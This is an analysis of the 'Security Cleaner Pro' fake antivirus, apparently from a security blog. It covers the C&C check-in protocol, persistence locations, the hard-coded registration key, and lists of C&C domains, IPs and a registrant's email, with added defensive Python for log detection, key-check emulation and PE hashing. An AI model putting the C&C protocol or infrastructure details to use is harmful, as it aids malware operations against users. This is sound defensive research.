Another one of the FakeAVs, this time called "Security Cleaner Pro". Detection is quite low: 4/48 on VirusTotal for the loader and 8/48 for the payload.

Loader: 2a8038d3acd963e804ca38a912ba116b (VirusTotal)

Payload: 8d15016f249274158e0472a02f9de00e (VirusTotal)

Analysis

This sample was dropped by the Blackhole exploit kit and installed itself as usual: a shortcut on the desktop and an icon active in the system tray.

When the loader starts it tries to set up a connection to the C&C to report a new loader install. It then requests a payload. Once the payload has installed it checks in as well to report a successful install, and after that the FakeAV payload checks in at a regular interval to confirm payment with the C&C. On the network level this looks like the following, step by step:

GET http://<domain>.tld/index/install/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]&advertid=[0-9]{5}&type=1

200 OK (text/html)

GET http://<domain>.tld/index/getsoft/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]&advertid=[0-9]{5}&type=1

200 OK (application/octet-stream)

GET http://<domain>.tld/index/install/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]&advertid=[0-9]{5}&type=2

200 OK (text/html)

GET http://<domain>.tld/index/checklic/?id=<system id>&os=(xp|win7|win8)(pro)?sp[0-9]

200 OK (text/html)

As you can see, the install check-in with type=1 is the loader and type=2 is the actual FakeAV payload. The payload we get back is not crypted (it is served as-is, not wrapped by a crypter).
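To turn the check-in structure above into a detection, here is an added example (not code from the original post) that classifies proxy-log entries against the four URL shapes and pulls out the system ID and affiliate ID. The log line format, client IPs, timestamps and the system ID are constructed for the example; the hostnames are two of the C&C domains seen in this campaign.

```python
import re
from urllib.parse import urlsplit, parse_qs

# URL shapes and parameter formats as observed in the check-ins above.
PATH_RE = re.compile(r"^/index/(install|getsoft|checklic)/?$")
OS_RE = re.compile(r"^(xp|win7|win8)(pro)?sp[0-9]$")
ADVERTID_RE = re.compile(r"^[0-9]{5}$")

# install type=1 is the loader, type=2 the FakeAV payload; getsoft fetches the
# payload; checklic is the periodic "did they pay yet" poll.
STAGES = {
    ("install", "1"): "loader_install",
    ("install", "2"): "payload_install",
    ("getsoft", None): "payload_download",
    ("checklic", None): "license_check",
}

def classify_request(url):
    """Return a dict describing the C&C check-in, or None if the URL does not fit."""
    parts = urlsplit(url)
    m = PATH_RE.match(parts.path)
    if not m:
        return None
    action = m.group(1)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    # Every check-in carries the system id and an os string of the observed shape.
    if "id" not in params or not OS_RE.match(params.get("os", "")):
        return None
    if action == "checklic":
        stage = STAGES[("checklic", None)]
    else:
        # install and getsoft also carry the 5-digit affiliate id.
        if not ADVERTID_RE.match(params.get("advertid", "")):
            return None
        key = (action, params.get("type")) if action == "install" else ("getsoft", None)
        stage = STAGES.get(key)
        if stage is None:
            return None
    return {
        "host": parts.hostname,
        "stage": stage,
        "system_id": params["id"],
        "advertid": params.get("advertid"),
        "os": params["os"],
    }

# Constructed proxy-log format: "<timestamp> <client> <method> <url> <status>".
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})")

def scan_proxy_log(lines):
    """Yield one hit per log line that matches a Security Cleaner Pro check-in."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "GET":
            continue
        info = classify_request(m.group("url"))
        if info:
            info.update(client=m.group("client"), ts=m.group("ts"))
            hits.append(info)
    return hits

# Constructed sample log: one full infection sequence plus an unrelated request.
SAMPLE_LOG = [
    "2013-03-01T10:00:01Z 10.0.0.5 GET http://wirejournal.biz/index/install/?id=ABCDEF0123&os=xpprosp3&advertid=12345&type=1 200",
    "2013-03-01T10:00:02Z 10.0.0.5 GET http://wirejournal.biz/index/getsoft/?id=ABCDEF0123&os=xpprosp3&advertid=12345&type=1 200",
    "2013-03-01T10:00:09Z 10.0.0.5 GET http://wirejournal.biz/index/install/?id=ABCDEF0123&os=xpprosp3&advertid=12345&type=2 200",
    "2013-03-01T10:05:00Z 10.0.0.5 GET http://lenderspoker.in/index/checklic/?id=ABCDEF0123&os=xpprosp3 200",
    "2013-03-01T10:05:03Z 10.0.0.7 GET http://www.example.com/index/install/?page=1 200",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit["ts"], hit["client"], hit["host"], hit["stage"], "advertid=%s" % hit["advertid"])
```

The path alone is too generic to alert on (plenty of sites have /index/install/), so the classifier insists on the full parameter shape; the advertid it extracts is what lets you group victims by the affiliate that infected them.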

After the payload has been downloaded it is copied to:

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\shl.exe

The filename is fixed and always seems to be the same. One thing to note: other versions I had installed into the All Users application data folder and set a Run key instead of dropping into the Startup folder, like so:

[ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run ], "ProtSoftware Inc" = "C:\Documents and Settings\All Users\Application Data\shl.exe"



The filename shl.exe seems to be fixed since earlier versions as well.

After setting itself up, the application starts with the usual "infected" scan results:



So yes, the usual: we are infected! Before digging into the activation, let's look around the application. It features (fake) updating:



The rest of the application shows generic options, which are all (obviously) fake and have no function.

You can also contact the support desk via email by clicking the button at the top:



From time to time there is also a fake Windows Security Center popup warning you to activate the AV. The entire dialog is an image, and clicking anywhere just brings the FakeAV to the front:



Another trick this FakeAV pulls is locking the browser down to Internet Explorer only. When a new process is spawned it checks the image name: if it is iexplore.exe (Internet Explorer) it is allowed to run, otherwise the process is killed. Funnily enough it cannot pick up new processes fast enough, so if you start your debugger 5-10 times in quick succession one of them survives.

The injection into IE looks like this when you try to browse anywhere:



Let's look at the activation of this "product". When you click register you get a page that looks really familiar; it seems to be a generic payment template, also used by the Titan AV I wrote about some time ago.

We can pay or enter a registration key ourselves.

If we cancel we get a warning message about how unprotected we are.

And if we enter the wrong information we get a warning.



So we open up our debugger and figure out how the check works:

00407F62 |> 50              PUSH EAX                                 ; /String2
00407F63 |. 51              PUSH ECX                                 ; |String1
00407F64 |. FF15 BC704100   CALL DWORD PTR DS:[<&KERNEL32.lstrcmpiW> ; \KERNEL32.lstrcmpiW
00407F6A |. 8BD8            MOV EBX,EAX
00407F6C |. F7DB            NEG EBX
00407F6E |. 1ADB            SBB BL,BL
00407F70 |. 6A 01           PUSH 1                                   ; /Arg1 = 1
00407F72 |. 33FF            XOR EDI,EDI                              ; |
00407F74 |. 8D75 9C         LEA ESI,[EBP-64]                         ; |
00407F77 |. E8 63260000     CALL 0040A5DF                            ; \security_cleaner_pro.0040A5DF
00407F7C |. FEC3            INC BL
00407F7E |. 74 2B           JZ SHORT 00407FAB
00407F80 |. 6A 40           PUSH 40                                  ; /Type = MB_OK|MB_ICONASTERISK|MB_DEFBUTTON1|MB_APPLMODAL
00407F82 |. 68 64C74100     PUSH OFFSET 0041C764                     ; |Caption = "Information"
00407F87 |. 68 7CC74100     PUSH OFFSET 0041C77C                     ; |Text = "Thank you for registering!"
00407F8C |. FF75 98         PUSH DWORD PTR SS:[EBP-68]               ; |hOwner => [ARG.EBP-68]
00407F8F |. FF15 20724100   CALL DWORD PTR DS:[<&USER32.MessageBoxW> ; \USER32.MessageBoxW

A simple string compare with the real key (lstrcmpiW, so the comparison is case-insensitive; the NEG/SBB/INC sequence just turns its return value into a zero/non-zero flag for the JZ). To activate this FakeAV we can therefore use the following key, which is hard-coded in all the bins I've tried. The key:



YKGVWHVSFETPXBIMDXUJSUYGPRADAOHZ
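The check above can be modelled in a few lines. This is an added example, not code from the post: it reproduces the case-insensitive compare and the NEG/SBB/INC flag trick from the listing, so you can see why the "Thank you for registering!" box is only reached when lstrcmpiW returns 0 and why a lower-case key is accepted too. Using upper() to stand in for lstrcmpiW's locale-aware comparison is an assumption that holds for this plain ASCII key.

```python
KEY = "YKGVWHVSFETPXBIMDXUJSUYGPRADAOHZ"   # hard-coded key quoted above


def lstrcmpi_result(string1, string2):
    """Model lstrcmpiW: 0 on a case-insensitive match, otherwise the sign of the
    difference. upper() approximates the locale-aware compare (assumption)."""
    a, b = string1.upper(), string2.upper()
    return (a > b) - (a < b)


def neg_sbb_inc(eax):
    """Emulate MOV EBX,EAX / NEG EBX / SBB BL,BL / INC BL on the lstrcmpiW
    return value. Returns (BL, jz_taken); JZ taken means the success
    MessageBoxW is skipped."""
    ebx = eax & 0xFFFFFFFF
    carry = 1 if ebx != 0 else 0        # NEG sets CF iff the operand was non-zero
    bl = (0 - 0 - carry) & 0xFF         # SBB BL,BL -> 0x00 (match) or 0xFF (mismatch)
    bl = (bl + 1) & 0xFF                # INC BL   -> 0x01 (match) or 0x00 (mismatch)
    return bl, bl == 0                  # ZF set only on mismatch


def key_accepted(entered):
    """True when the registration dialog would show the 'Thank you' box."""
    result = lstrcmpi_result(entered, KEY)
    _, jz_taken = neg_sbb_inc(result)
    return not jz_taken


if __name__ == "__main__":
    for candidate in (KEY, KEY.lower(), KEY + " ", "AAAA"):
        print(repr(candidate), "->", "registered" if key_accepted(candidate) else "rejected")
```

Note that the compare is exact apart from case: trailing whitespace or a missing character is rejected, so a key pasted with a stray space fails.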

Now we are licensed and can "clean" the infections found during the scan. We are also allowed to start new applications again.

And as we can expect after registration any new scan turns up no infections.

Command and Control Server(s)

So with this FakeAV there are 4 dedicated C&C servers forming the backend. The initial domain seen with the first version I got was wirejournal.biz; after a day or so I got a new hit on lenderspoker.in. All the domains have multiple A records pointing to:

188.93.210.164 - Russian Federation Moscow Ltd Hosting Service

109.234.154.254 - Russian Federation Saint Petersburg Ooo Network Of Data-centers Selectel

109.120.150.95 - Russian Federation Saint Petersburg Zao National Telecommunications

91.240.22.98 - Ukraine Donets'k Wibo Project Llc

After some more checking I was able to find more domains hosted on these IPs. Not sure what all of these are for, but it is a fairly big list for just a FakeAV:

blogscifi.info

corporationsbenefits.info

hichspeedtest.com

high-speed-dns.com

journalvillepremium.info

lenderspoker.in

lite-interserve-promo.com

mapaddiction.biz

ntbook.ru

podcastbots.info

psychologistdrive.info

requiresearch.info

testingadvisor.info

wirejournal.biz

woolis.ru

At the beginning you saw the structure of the check-ins. One of the parameters sent with the check-in is "advertid". This refers to an affiliate of the program: you sign up, get your own affiliate ID, spread the loader given to you (which checks in with your personal ID), and for every new client you infect with it you get paid. As simple as that.





One thing the C&C servers do when serving the loaders or payloads is modify a PE resource of type RCDATA to hold the affiliate's personal ID. This way an infection can be traced back to the appropriate affiliate for payment, and it also means every affiliate gets unique binaries. I've been able to identify at least 49 affiliates and have retrieved 89 unique loaders and 42 payloads. To get the AV vendors to create generic detection instead of per-hash signatures I've decided to upload all of them. At the end of the article you will find a section called "Unique Samples" with their VT links. If you want any of these samples to analyze/play with, send me a message on Twitter or email me.
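As an added illustration (not code from the post) of why per-hash signatures fall apart here and what to key on instead: the script below fabricates two minimal PE32 images that share the same code but carry a different affiliate ID in the resource section, then hashes every section except .rsrc so both builds collapse to one value. The PE writer, the stand-in loader code and the IDs are constructed for the demo. In a real sample the ID sits inside an RCDATA entry in the resource directory tree, so you would read it with a resource walker such as pefile rather than taking .rsrc raw as done here.

```python
import hashlib
import struct

SECTION_ALIGN = 0x1000
FILE_ALIGN = 0x200


def _align(n, a):
    return (n + a - 1) & ~(a - 1)


def build_pe(sections):
    """Write a bare PE32 image from [(name, raw_bytes), ...]. Constructed test
    input only: enough of a header for a section-table walk, nothing more."""
    opt_size = 0xE0
    headers_len = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    first_raw = _align(headers_len, FILE_ALIGN)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)             # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)        # PE32 magic, rest zeroed
    table, body, raw_off, va = b"", b"", first_raw, SECTION_ALIGN
    for name, data in sections:
        raw_size = _align(len(data), FILE_ALIGN)
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(data), va, raw_size, raw_off, 0, 0, 0, 0, 0x40000040)
        body += data.ljust(raw_size, b"\0")
        raw_off += raw_size
        va += _align(max(len(data), 1), SECTION_ALIGN)
    return (dos + coff + opt + table).ljust(first_raw, b"\0") + body


def sections(pe):
    """Walk the section table of a PE: [(name, raw_offset, raw_size), ...]."""
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, = struct.unpack_from("<H", pe, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size
    out = []
    for i in range(nsec):
        name, _vsize, _va, raw_size, raw_off = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        out.append((name.rstrip(b"\0").decode("ascii", "replace"), raw_off, raw_size))
    return out


def section_data(pe, wanted):
    for name, off, size in sections(pe):
        if name == wanted:
            return pe[off:off + size]
    return None


def file_hash(pe):
    """Whole-file MD5, i.e. what the VT listings above are keyed on."""
    return hashlib.md5(pe).hexdigest()


def code_hash(pe, skip=(".rsrc",)):
    """SHA-256 over every section except those in `skip`, so the per-affiliate
    resource edit does not change the value."""
    h = hashlib.sha256()
    for name, off, size in sections(pe):
        if name in skip:
            continue
        h.update(name.encode() + b"\0")
        h.update(pe[off:off + size])
    return h.hexdigest()


# Constructed stand-in for the shared loader code, identical for every affiliate.
LOADER_CODE = b"\x55\x8b\xec\x83\xec\x64" + b"\x90" * 200


def make_affiliate_build(advertid):
    """Mimic the C&C stamping an affiliate ID into the resource section."""
    return build_pe([(".text", LOADER_CODE), (".rsrc", b"RCDATA:" + advertid.encode())])


if __name__ == "__main__":
    for advertid in ("12345", "67890"):
        pe = make_affiliate_build(advertid)
        print(advertid, "file md5:", file_hash(pe), "code sha256:", code_hash(pe)[:16])
```

The two builds get different file hashes but the same code hash, which is the property a generic signature (or a YARA rule over .text) needs; the resource section, meanwhile, is exactly where to look to recover which affiliate a victim's binary came from.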

Additional info

Additionally, when running the FakeAV through my debugger I found the following string in memory: "http://softsupport.info/open.php". This domain is registered to someone with the email address "dorvey_creator@rocketmail.com". Looking that address up gives a list of domains all pointing to either 95.141.28.79 or 95.141.28.81. The list of domains I was able to get already looks sketchy:

cleanerpro1.biz

cleanerpro2.biz

cleanerpro3.biz

cleanerpro4.biz

cleanerpro5.biz

cleaner-pro1.biz

cleaner-pro2.biz

cleaner-pro3.biz

cleaner-pro4.biz

cleaner-pro5.biz

cleaner-pro6.biz

cleaner-pro7.biz

cleaner-pro8.biz

cleaner-pro9.biz

cleaner-pro10.biz

cleaner17.biz

I do not know what this person is up to, but if you also check the VT entries for those IPs ([95.141.28.79] and [95.141.28.81]) you can see tons of DynDNS entries passing by. If I find out what his connection to this FakeAV is, or what he is doing with those servers and domains, I'll write another article.





Unique Samples

Loaders (88 in total)

Payloads (42 in total)